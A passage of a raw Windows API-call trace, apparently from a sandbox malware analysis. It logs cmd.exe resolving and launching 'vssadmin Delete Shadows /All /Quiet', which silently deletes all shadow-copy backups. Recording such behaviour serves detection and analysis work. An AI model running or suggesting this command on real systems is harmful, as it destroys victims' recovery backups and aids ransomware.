lpMem=0x209540 | out: hHeap=0x1f0000) returned 1 [0119.457] GetEnvironmentStringsW () returned 0x208ab0* [0119.457] GetProcessHeap () returned 0x1f0000 [0119.457] RtlAllocateHeap (HeapHandle=0x1f0000, Flags=0x8, Size=0xa94) returned 0x20ac80 [0119.457] FreeEnvironmentStringsW (penv=0x208ab0) returned 1 [0119.457] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49e9f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0119.457] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49e9f360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0119.458] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0119.458] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0119.458] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0119.458] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0119.458] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0119.458] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0119.458] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0119.458] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0119.458] GetProcessHeap () returned 0x1f0000 [0119.458] RtlAllocateHeap (HeapHandle=0x1f0000, Flags=0x8, Size=0x26) returned 0x204600 [0119.458] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x18f910 | out: lpBuffer="C:\\Windows") returned 0xa [0119.458] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x104, lpBuffer=0x18f910, lpFilePart=0x18f8f0 | out: lpBuffer="C:\\Windows", lpFilePart=0x18f8f0*="Windows") returned 0xa [0119.458] GetFileAttributesW (lpFileName="C:\\Windows" (normalized: "c:\\windows")) returned 0x10 [0119.458] FindFirstFileW (in: lpFileName="C:\\Windows", lpFindFileData=0x18f620 | out: lpFindFileData=0x18f620*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfcdbbfc0, ftLastAccessTime.dwHighDateTime=0x1d68bac, ftLastWriteTime.dwLowDateTime=0xfcdbbfc0, ftLastWriteTime.dwHighDateTime=0x1d68bac, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="Windows", cAlternateFileName="")) returned 0x20b720 [0119.458] FindClose (in: hFindFile=0x20b720 | out: hFindFile=0x20b720) returned 1 [0119.458] GetFileAttributesW (lpFileName="C:\\Windows" (normalized: "c:\\windows")) returned 0x10 [0119.458] SetCurrentDirectoryW (lpPathName="C:\\Windows" (normalized: "c:\\windows")) returned 1 [0119.458] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Windows") returned 1 [0119.458] GetProcessHeap () returned 0x1f0000 [0119.458] HeapFree (in: hHeap=0x1f0000, dwFlags=0x0, lpMem=0x20ac80 | out: hHeap=0x1f0000) returned 1 [0119.458] GetEnvironmentStringsW () returned 0x20ac80* [0119.459] GetProcessHeap () returned 0x1f0000 [0119.459] RtlAllocateHeap (HeapHandle=0x1f0000, Flags=0x8, Size=0xab2) returned 0x208ab0 [0119.459] FreeEnvironmentStringsW (penv=0x20ac80) returned 1 [0119.459] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49eac0a0 | out: lpBuffer="C:\\Windows") returned 0xa [0119.459] GetProcessHeap () returned 0x1f0000 [0119.459] HeapFree (in: hHeap=0x1f0000, dwFlags=0x0, lpMem=0x204600 | out: hHeap=0x1f0000) returned 1 [0119.459] GetProcessHeap () returned 0x1f0000 [0119.459] RtlAllocateHeap (HeapHandle=0x1f0000, Flags=0x8, Size=0x4016) returned 0x20ac80 [0119.459] GetProcessHeap () returned 0x1f0000 [0119.459] RtlAllocateHeap (HeapHandle=0x1f0000, Flags=0x8, Size=0x5c) returned 0x209570 [0119.459] GetProcessHeap () returned 0x1f0000 [0119.459] HeapFree (in: hHeap=0x1f0000, dwFlags=0x0, lpMem=0x20ac80 | out: hHeap=0x1f0000) returned 1 [0119.459] GetConsoleOutputCP () returned 0x1b5 [0119.459] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49eabfe0 | out: lpCPInfo=0x49eabfe0) returned 1 [0119.459] GetUserDefaultLCID () returned 0x409 [0119.460] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49ea7b50, cchData=8 | out: lpLCData=":") returned 2 [0119.460] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x18fa20, cchData=128 | out: lpLCData="0") returned 2 [0119.460] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x18fa20, cchData=128 | out: lpLCData="0") returned 2 [0119.460] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x18fa20, cchData=128 | out: lpLCData="1") returned 2 [0119.460] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49eba740, cchData=8 | out: lpLCData="/") returned 2 [0119.460] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49eba4a0, cchData=32 | out: lpLCData="Mon") returned 4 [0119.460] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49eba460, cchData=32 | out: lpLCData="Tue") returned 4 [0119.460] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49eba420, cchData=32 | out: lpLCData="Wed") returned 4 [0119.460] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49eba3e0, cchData=32 | out: lpLCData="Thu") returned 4 [0119.460] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49eba3a0, cchData=32 | out: lpLCData="Fri") returned 4 [0119.460] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49eba360, cchData=32 | out: lpLCData="Sat") returned 4 [0119.460] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49eba700, cchData=32 | out: lpLCData="Sun") returned 4 [0119.460] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49ea7b40, cchData=8 | out: lpLCData=".") returned 2 [0119.460] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49eba4e0, cchData=8 | out: lpLCData=",") returned 2 [0119.460] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0119.461] GetProcessHeap () returned 0x1f0000 [0119.461] RtlAllocateHeap (HeapHandle=0x1f0000, Flags=0x0, Size=0x20c) returned 0x209650 [0119.461] GetConsoleTitleW (in: lpConsoleTitle=0x209650, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0119.461] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77940000 [0119.461] GetProcAddress (hModule=0x77940000, lpProcName="CopyFileExW") returned 0x779523d0 [0119.461] GetProcAddress (hModule=0x77940000, lpProcName="IsDebuggerPresent") returned 0x77948290 [0119.461] GetProcAddress (hModule=0x77940000, lpProcName="SetConsoleInputExeNameW") returned 0x779517e0 [0119.461] GetProcessHeap () returned 0x1f0000 [0119.461] RtlAllocateHeap (HeapHandle=0x1f0000, Flags=0x8, Size=0x4012) returned 0x20ac80 [0119.461] GetProcessHeap () returned 0x1f0000 [0119.461] HeapFree (in: hHeap=0x1f0000, dwFlags=0x0, lpMem=0x20ac80 | out: hHeap=0x1f0000) returned 1 [0119.462] _wcsicmp (_String1="vssadmin", _String2=")") returned 77 [0119.462] _wcsicmp (_String1="FOR", _String2="vssadmin") returned -16 [0119.462] _wcsicmp (_String1="FOR/?", _String2="vssadmin") returned -16 [0119.462] _wcsicmp (_String1="IF", _String2="vssadmin") returned -13 [0119.462] _wcsicmp (_String1="IF/?", _String2="vssadmin") returned -13 [0119.462] _wcsicmp (_String1="REM", _String2="vssadmin") returned -4 [0119.462] _wcsicmp (_String1="REM/?", _String2="vssadmin") returned -4 [0119.462] GetProcessHeap () returned 0x1f0000 [0119.462] RtlAllocateHeap (HeapHandle=0x1f0000, Flags=0x8, Size=0xb0) returned 0x209870 [0119.462] GetProcessHeap () returned 0x1f0000 [0119.462] RtlAllocateHeap (HeapHandle=0x1f0000, Flags=0x8, Size=0x22) returned 0x204600 [0119.463] GetProcessHeap () returned 0x1f0000 [0119.463] RtlAllocateHeap (HeapHandle=0x1f0000, Flags=0x8, Size=0x48) returned 0x208370 [0119.463] GetConsoleTitleW (in: lpConsoleTitle=0x18f930, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0119.464] _wcsicmp (_String1="vssadmin", _String2="DIR") returned 18 [0119.464] _wcsicmp (_String1="vssadmin", _String2="ERASE") returned 17 [0119.464] _wcsicmp (_String1="vssadmin", _String2="DEL") returned 18 [0119.464] _wcsicmp (_String1="vssadmin", _String2="TYPE") returned 2 [0119.464] _wcsicmp (_String1="vssadmin", _String2="COPY") returned 19 [0119.464] _wcsicmp (_String1="vssadmin", _String2="CD") returned 19 [0119.464] _wcsicmp (_String1="vssadmin", _String2="CHDIR") returned 19 [0119.464] _wcsicmp (_String1="vssadmin", _String2="RENAME") returned 4 [0119.464] _wcsicmp (_String1="vssadmin", _String2="REN") returned 4 [0119.464] _wcsicmp (_String1="vssadmin", _String2="ECHO") returned 17 [0119.464] _wcsicmp (_String1="vssadmin", _String2="SET") returned 3 [0119.464] _wcsicmp (_String1="vssadmin", _String2="PAUSE") returned 6 [0119.464] _wcsicmp (_String1="vssadmin", _String2="DATE") returned 18 [0119.464] _wcsicmp (_String1="vssadmin", _String2="TIME") returned 2 [0119.464] _wcsicmp (_String1="vssadmin", _String2="PROMPT") returned 6 [0119.464] _wcsicmp (_String1="vssadmin", _String2="MD") returned 9 [0119.464] _wcsicmp (_String1="vssadmin", _String2="MKDIR") returned 9 [0119.464] _wcsicmp (_String1="vssadmin", _String2="RD") returned 4 [0119.464] _wcsicmp (_String1="vssadmin", _String2="RMDIR") returned 4 [0119.464] _wcsicmp (_String1="vssadmin", _String2="PATH") returned 6 [0119.464] _wcsicmp (_String1="vssadmin", _String2="GOTO") returned 15 [0119.464] _wcsicmp (_String1="vssadmin", _String2="SHIFT") returned 3 [0119.464] _wcsicmp (_String1="vssadmin", _String2="CLS") returned 19 [0119.464] _wcsicmp (_String1="vssadmin", _String2="CALL") returned 19 [0119.464] _wcsicmp (_String1="vssadmin", _String2="VERIFY") returned 14 [0119.464] _wcsicmp (_String1="vssadmin", _String2="VER") returned 14 [0119.464] _wcsicmp (_String1="vssadmin", _String2="VOL") returned 4 [0119.464] _wcsicmp (_String1="vssadmin", _String2="EXIT") returned 17 [0119.465] _wcsicmp (_String1="vssadmin", _String2="SETLOCAL") returned 3 [0119.465] _wcsicmp (_String1="vssadmin", _String2="ENDLOCAL") returned 17 [0119.465] _wcsicmp (_String1="vssadmin", _String2="TITLE") returned 2 [0119.465] _wcsicmp (_String1="vssadmin", _String2="START") returned 3 [0119.465] _wcsicmp (_String1="vssadmin", _String2="DPATH") returned 18 [0119.465] _wcsicmp (_String1="vssadmin", _String2="KEYS") returned 11 [0119.465] _wcsicmp (_String1="vssadmin", _String2="MOVE") returned 9 [0119.465] _wcsicmp (_String1="vssadmin", _String2="PUSHD") returned 6 [0119.465] _wcsicmp (_String1="vssadmin", _String2="POPD") returned 6 [0119.465] _wcsicmp (_String1="vssadmin", _String2="ASSOC") returned 21 [0119.465] _wcsicmp (_String1="vssadmin", _String2="FTYPE") returned 16 [0119.465] _wcsicmp (_String1="vssadmin", _String2="BREAK") returned 20 [0119.465] _wcsicmp (_String1="vssadmin", _String2="COLOR") returned 19 [0119.465] _wcsicmp (_String1="vssadmin", _String2="MKLINK") returned 9 [0119.465] _wcsicmp (_String1="vssadmin", _String2="DIR") returned 18 [0119.465] _wcsicmp (_String1="vssadmin", _String2="ERASE") returned 17 [0119.465] _wcsicmp (_String1="vssadmin", _String2="DEL") returned 18 [0119.465] _wcsicmp (_String1="vssadmin", _String2="TYPE") returned 2 [0119.465] _wcsicmp (_String1="vssadmin", _String2="COPY") returned 19 [0119.465] _wcsicmp (_String1="vssadmin", _String2="CD") returned 19 [0119.465] _wcsicmp (_String1="vssadmin", _String2="CHDIR") returned 19 [0119.465] _wcsicmp (_String1="vssadmin", _String2="RENAME") returned 4 [0119.465] _wcsicmp (_String1="vssadmin", _String2="REN") returned 4 [0119.465] _wcsicmp (_String1="vssadmin", _String2="ECHO") returned 17 [0119.465] _wcsicmp (_String1="vssadmin", _String2="SET") returned 3 [0119.465] _wcsicmp (_String1="vssadmin", _String2="PAUSE") returned 6 [0119.465] _wcsicmp (_String1="vssadmin", _String2="DATE") returned 18 [0119.465] _wcsicmp (_String1="vssadmin", _String2="TIME") returned 2 [0119.465] _wcsicmp (_String1="vssadmin", _String2="PROMPT") returned 6 [0119.465] _wcsicmp (_String1="vssadmin", _String2="MD") returned 9 [0119.465] _wcsicmp (_String1="vssadmin", _String2="MKDIR") returned 9 [0119.465] _wcsicmp (_String1="vssadmin", _String2="RD") returned 4 [0119.465] _wcsicmp (_String1="vssadmin", _String2="RMDIR") returned 4 [0119.466] _wcsicmp (_String1="vssadmin", _String2="PATH") returned 6 [0119.466] _wcsicmp (_String1="vssadmin", _String2="GOTO") returned 15 [0119.466] _wcsicmp (_String1="vssadmin", _String2="SHIFT") returned 3 [0119.466] _wcsicmp (_String1="vssadmin", _String2="CLS") returned 19 [0119.466] _wcsicmp (_String1="vssadmin", _String2="CALL") returned 19 [0119.466] _wcsicmp (_String1="vssadmin", _String2="VERIFY") returned 14 [0119.466] _wcsicmp (_String1="vssadmin", _String2="VER") returned 14 [0119.466] _wcsicmp (_String1="vssadmin", _String2="VOL") returned 4 [0119.466] _wcsicmp (_String1="vssadmin", _String2="EXIT") returned 17 [0119.466] _wcsicmp (_String1="vssadmin", _String2="SETLOCAL") returned 3 [0119.466] _wcsicmp (_String1="vssadmin", _String2="ENDLOCAL") returned 17 [0119.466] _wcsicmp (_String1="vssadmin", _String2="TITLE") returned 2 [0119.466] _wcsicmp (_String1="vssadmin", _String2="START") returned 3 [0119.466] _wcsicmp (_String1="vssadmin", _String2="DPATH") returned 18 [0119.466] _wcsicmp (_String1="vssadmin", _String2="KEYS") returned 11 [0119.466] _wcsicmp (_String1="vssadmin", _String2="MOVE") returned 9 [0119.466] _wcsicmp (_String1="vssadmin", _String2="PUSHD") returned 6 [0119.466] _wcsicmp (_String1="vssadmin", _String2="POPD") returned 6 [0119.466] _wcsicmp (_String1="vssadmin", _String2="ASSOC") returned 21 [0119.466] _wcsicmp (_String1="vssadmin", _String2="FTYPE") returned 16 [0119.466] _wcsicmp (_String1="vssadmin", _String2="BREAK") returned 20 [0119.466] _wcsicmp (_String1="vssadmin", _String2="COLOR") returned 19 [0119.466] _wcsicmp (_String1="vssadmin", _String2="MKLINK") returned 9 [0119.466] _wcsicmp (_String1="vssadmin", _String2="FOR") returned 16 [0119.466] _wcsicmp (_String1="vssadmin", _String2="IF") returned 13 [0119.466] _wcsicmp (_String1="vssadmin", _String2="REM") returned 4 [0119.467] GetProcessHeap () returned 0x1f0000 [0119.467] RtlAllocateHeap (HeapHandle=0x1f0000, Flags=0x8, Size=0x218) returned 0x209930 [0119.467] GetProcessHeap () returned 0x1f0000 [0119.467] RtlAllocateHeap (HeapHandle=0x1f0000, Flags=0x8, Size=0x5a) returned 0x209b50 [0119.467] _wcsnicmp (_String1="vssa", _String2="cmd ", _MaxCount=0x4) returned 19 [0119.467] GetProcessHeap () returned 0x1f0000 [0119.467] RtlAllocateHeap (HeapHandle=0x1f0000, Flags=0x8, Size=0x420) returned 0x20ac80 [0119.467] SetErrorMode (uMode=0x0) returned 0x0 [0119.467] SetErrorMode (uMode=0x1) returned 0x0 [0119.467] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x20ac90, lpFilePart=0x18f1c0 | out: lpBuffer="C:\\Windows", lpFilePart=0x18f1c0*="Windows") returned 0xa [0119.467] SetErrorMode (uMode=0x0) returned 0x1 [0119.467] GetProcessHeap () returned 0x1f0000 [0119.467] RtlReAllocateHeap (Heap=0x1f0000, Flags=0x0, Ptr=0x20ac80, Size=0x38) returned 0x20ac80 [0119.467] GetProcessHeap () returned 0x1f0000 [0119.467] RtlSizeHeap (HeapHandle=0x1f0000, Flags=0x0, MemoryPointer=0x20ac80) returned 0x38 [0119.467] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49e9f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0119.467] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0119.468] GetProcessHeap () returned 0x1f0000 [0119.468] RtlAllocateHeap (HeapHandle=0x1f0000, Flags=0x8, Size=0xf2) returned 0x209bc0 [0119.468] GetProcessHeap () returned 0x1f0000 [0119.468] RtlAllocateHeap (HeapHandle=0x1f0000, Flags=0x8, Size=0x1d4) returned 0x209cc0 [0119.473] GetProcessHeap () returned 0x1f0000 [0119.474] RtlReAllocateHeap (Heap=0x1f0000, Flags=0x0, Ptr=0x209cc0, Size=0xf4) returned 0x209cc0 [0119.474] GetProcessHeap () returned 0x1f0000 [0119.474] RtlSizeHeap (HeapHandle=0x1f0000, Flags=0x0, MemoryPointer=0x209cc0) returned 0xf4 [0119.474] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49e9f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0119.474] GetProcessHeap () returned 0x1f0000 [0119.474] RtlAllocateHeap (HeapHandle=0x1f0000, Flags=0x8, Size=0xe8) returned 0x209dd0 [0119.474] GetProcessHeap () returned 0x1f0000 [0119.474] RtlReAllocateHeap (Heap=0x1f0000, Flags=0x0, Ptr=0x209dd0, Size=0x7e) returned 0x209dd0 [0119.474] GetProcessHeap () returned 0x1f0000 [0119.474] RtlSizeHeap (HeapHandle=0x1f0000, Flags=0x0, MemoryPointer=0x209dd0) returned 0x7e [0119.475] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0119.475] FindFirstFileExW (in: lpFileName="C:\\Windows\\vssadmin.*", fInfoLevelId=0x1, lpFindFileData=0x18ef30, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18ef30) returned 0xffffffffffffffff [0119.475] GetLastError () returned 0x2 [0119.475] FindFirstFileExW (in: lpFileName="C:\\Windows\\vssadmin", fInfoLevelId=0x1, lpFindFileData=0x18ef30, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18ef30) returned 0xffffffffffffffff [0119.475] GetLastError () returned 0x2 [0119.476] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0119.476] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.*", fInfoLevelId=0x1, lpFindFileData=0x18ef30, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18ef30) returned 0x209e60 [0119.476] GetProcessHeap () returned 0x1f0000 [0119.476] RtlAllocateHeap (HeapHandle=0x1f0000, Flags=0x0, Size=0x28) returned 0x204630 [0119.476] FindClose (in: hFindFile=0x209e60 | out: hFindFile=0x209e60) returned 1 [0119.476] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.COM", fInfoLevelId=0x1, lpFindFileData=0x18ef30, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18ef30) returned 0xffffffffffffffff [0119.476] GetLastError () returned 0x2 [0119.476] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.EXE", fInfoLevelId=0x1, lpFindFileData=0x18ef30, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18ef30) returned 0x209e60 [0119.476] GetProcessHeap () returned 0x1f0000 [0119.476] RtlReAllocateHeap (Heap=0x1f0000, Flags=0x0, Ptr=0x204630, Size=0x8) returned 0x209ec0 [0119.476] FindClose (in: hFindFile=0x209e60 | out: hFindFile=0x209e60) returned 1 [0119.476] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0119.476] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0119.476] GetConsoleTitleW (in: lpConsoleTitle=0x18f480, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0119.476] InitializeProcThreadAttributeList (in: lpAttributeList=0x18f238, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x18f1f8 | out: lpAttributeList=0x18f238, lpSize=0x18f1f8) returned 1 [0119.477] UpdateProcThreadAttribute (in: lpAttributeList=0x18f238, dwFlags=0x0, Attribute=0x60001, lpValue=0x18f1e8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x18f238, lpPreviousValue=0x0) returned 1 [0119.477] GetStartupInfoW (in: lpStartupInfo=0x18f350 | out: lpStartupInfo=0x18f350*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1, hStdOutput=0x0, hStdError=0x0)) [0119.477] GetProcessHeap () returned 0x1f0000 [0119.477] RtlAllocateHeap (HeapHandle=0x1f0000, Flags=0x8, Size=0x20) returned 0x204630 [0119.477] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0119.477] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0119.477] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0119.477] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0119.477] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0119.477] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0119.477] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0119.477] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0119.477] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0119.477] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0119.477] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0119.477] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0119.477] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0119.477] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0119.477] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0119.477] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0119.477] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0119.477] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0119.477] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0119.477] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0119.477] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0119.477] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0119.477] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0119.477] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0119.477] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0119.477] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0119.478] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0119.478] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0119.478] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0119.478] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0119.478] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0119.478] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0119.478] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0119.478] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0119.478] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0119.478] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0119.478] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0119.478] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0119.478] GetProcessHeap () returned 0x1f0000 [0119.478] HeapFree (in: hHeap=0x1f0000, dwFlags=0x0, lpMem=0x204630 | out: hHeap=0x1f0000) returned 1 [0119.478] GetProcessHeap () returned 0x1f0000 [0119.478] RtlAllocateHeap (HeapHandle=0x1f0000, Flags=0x8, Size=0x12) returned 0x209e60 [0119.478] lstrcmpW (lpString1="\\vssadmin.exe", lpString2="\\XCOPY.EXE") returned -1 [0119.479] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\vssadmin.exe", lpCommandLine="vssadmin Delete Shadows /All /Quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows", lpStartupInfo=0x18f270*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="vssadmin Delete Shadows /All /Quiet", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18f220 | out: lpCommandLine="vssadmin Delete Shadows /All /Quiet", lpProcessInformation=0x18f220*(hProcess=0x54, hThread=0x50, dwProcessId=0xb98, dwThreadId=0xbf8)) returned 1 [0119.548] CloseHandle (hObject=0x50) returned 1 [0119.548] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0119.548] GetProcessHeap () returned 0x1f0000 [0119.548] HeapFree (in: hHeap=0x1f0000, dwFlags=0x0, lpMem=0x208ab0 | out: hHeap=0x1f0000) returned 1 [0119.548] GetEnvironmentStringsW () returned 0x208ab0* [0119.548] GetProcessHeap () returned 0x1f0000 [0119.548] RtlAllocateHeap (HeapHandle=0x1f0000, Flags=0x8, Size=0xab2) returned 0x20afc0 [0119.548] FreeEnvironmentStringsW (penv=0x208ab0) returned 1 [0119.548] WaitForSingleObject (hHandle=0x54, dwMilliseconds=0xffffffff) returned 0x0 [0191.179] GetExitCodeProcess (in: hProcess=0x54, lpExitCode=0x18f168 | out: lpExitCode=0x18f168*=0x0) returned 1 [0191.179] CloseHandle (hObject=0x54) returned 1 [0191.180] _vsnwprintf (in: _Buffer=0x18f3d8, _BufferCount=0x13, _Format="%08X", _ArgList=0x18f178 | out: _Buffer="00000000") returned 8 [0191.180] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0191.180] GetProcessHeap () returned 0x1f0000 [0191.180] HeapFree (in: hHeap=0x1f0000, dwFlags=0x0, lpMem=0x20afc0 | out: hHeap=0x1f0000) returned 1 [0191.180] GetEnvironmentStringsW () returned 0x1f1320* [0191.180] GetProcessHeap () returned 0x1f0000 [0191.180] RtlAllocateHeap (HeapHandle=0x1f0000, Flags=0x8, Size=0xad8) returned 0x20c560 [0191.181] FreeEnvironmentStringsW (penv=0x1f1320) returned 1 [0191.181] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0191.181] GetProcessHeap () returned 0x1f0000 [0191.181] HeapFree (in: hHeap=0x1f0000, dwFlags=0x0, lpMem=0x20c560 | out: hHeap=0x1f0000) returned 1 [0191.181] GetEnvironmentStringsW () returned 0x1f1320* [0191.181] GetProcessHeap () returned 0x1f0000 [0191.181] RtlAllocateHeap (HeapHandle=0x1f0000, Flags=0x8, Size=0xad8) returned 0x20c560 [0191.181] FreeEnvironmentStringsW (penv=0x1f1320) returned 1 [0191.181] GetProcessHeap () returned 0x1f0000 [0191.181] HeapFree (in: hHeap=0x1f0000, dwFlags=0x0, lpMem=0x209e60 | out: hHeap=0x1f0000) returned 1 [0191.181] DeleteProcThreadAttributeList (in: 